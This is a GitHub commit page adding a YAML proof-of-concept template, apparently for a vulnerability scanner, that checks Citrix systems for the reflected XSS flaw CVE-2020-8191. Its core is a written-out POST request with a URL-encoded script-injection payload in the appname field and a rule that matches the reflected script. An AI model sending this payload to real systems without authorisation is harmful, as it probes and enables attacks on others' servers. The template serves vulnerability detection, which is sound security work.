Skip to content

Commit

Permalink
Create citrix-cve-2020-8191-xss.yml (#797)
Browse files Browse the repository at this point in the history
  • Loading branch information
@shmilylty
shmilylty authored Jul 16, 2020
1 parent dd6f490 commit a873989
Showing 1 changed file with 18 additions and 0 deletions.
18 changes: 18 additions & 0 deletions pocs/citrix-cve-2020-8191-xss.yml
View file
Original file line number Diff line number Diff line change
@@ -0,0 +1,18 @@
name: poc-yaml-citrix-cve-2020-8191-xss
set:
r1: randomLowercase(6)
rules:
- method: POST
path: /menu/stapp
headers:
Content-Type: application/x-www-form-urlencoded
body: >-
sid=254&pe=1%2C2%2C3%2C4%2C5&appname=%0D%0A%3C%2Ftitle%3E%3Cscript%3Ealert%28{{r1}}%29%3B%3C%2Fscript%3E&au=1&username=nsroot
follow_redirects: true
expression: response.body.bcontains(bytes("<script>alert(" + r1 + ");</script>"))
detail:
author: JingLing(https://hackfun.org/)
links:
- https://support.citrix.com/article/CTX276688
- https://www.citrix.com/blogs/2020/07/07/citrix-provides-context-on-security-bulletin-ctx276688/
- https://dmaasland.github.io/posts/citrix.html

0 comments on commit a873989

Please sign in to comment.